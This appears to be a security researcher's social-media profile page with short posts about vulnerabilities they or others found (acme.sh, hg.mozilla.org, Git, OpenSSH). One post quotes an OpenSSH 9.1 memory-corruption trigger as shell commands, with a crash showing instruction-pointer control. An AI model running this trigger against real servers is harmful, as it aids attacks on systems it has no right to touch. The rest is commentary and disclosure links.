Profile for joern
About joern
Fields
- Website
- https://0day.click
- Threema
- https://threema.id/K8J68WTX
Bio
Your mom's favorite hacker!
My other account is @joernchen
- Joined
- Posts
- 687
- Followed by
- 1129
- Following
- 261
Stats
Recent public posts
exclude boosts#SchreinerManja und den manischen #Radweg-Wahn der #CDU stoppen? Komm morgen an die Demo! Gemeinsam zum roten Rathaus. 14 Uhr, Eberswalder Straße.
#ADFC #ChanginCities #FridaysForFuture #DerKlimablog #Klimakatastrophe #Zukunft #Sicherheit #Gesundheit
Well, I inadvertently discovered a zero-day RCE in acme.sh and got a Chinese CA to shut down overnight: https://github.com/acmesh-official/acme.sh/issues/4659
The other shell I got was via some funky LDAP truncation issue. Check out the write up at https://0day.click/recipe/pash/
Last Christmas I popped a shell¹ on http://hg.mozilla.org
Here's the fix:
https://hg.mozilla.org/hgcustom/version-control-tools/rev/0b02dd442661b4ada84e4c6dea58ab62cb8fbaca
Can you explain the bug?
FAQ:
- This is an authenticated vuln
- I'll post a writeup in the next days
- Yes, RTFM helps ... as usual
¹) actually it was two shells
Unpopular take: .zip domains were a marketing gag targeting security people.
We found some injection bugs in Go's html/template. That's to say stdlib-level XSS 
Stuff one finds buried in a shelf when moving ….
OR: Hot Single Sign Ons in your Collision Domain!
Hot Take: a lot of the "supply chain insecurity" news stories are not problems with the supply chain. So what if you managed to upload some crapware RAT to PyPi? No one will even use your malicious package ever. Even if you tried typosquating the package, the odds are still low that anyone important or a large chunk of the community would accidentally use your typosquated malicious package . Real supply chain issues are when a legitimate and *popular link in the supply chain (aka a popular library used by many other projects) becomes compromised.
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92
Here I was thinking this bug was hopeless and they one-line it without writing new code:
$ cp -i /usr/bin/ssh ./ssh
$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" 192.168.56.123 ;done
...
#1 0x4141414141414141 in ?? ()
Happy Valentine's Day!
I've got a little something for you all right here https://github.com/git/git/security/advisories/GHSA-r87m-v37r-cwfh
💕 Patch your Gits 💕
IDK but all those AI prompt injections like
seem to rely on in-band signalling which could have been avoided at design time by having separate channels for configuration and user input. But instead the 70s are calling and want their cereal whistles back
▓▓░░░░░░░░░░░░░ 10%
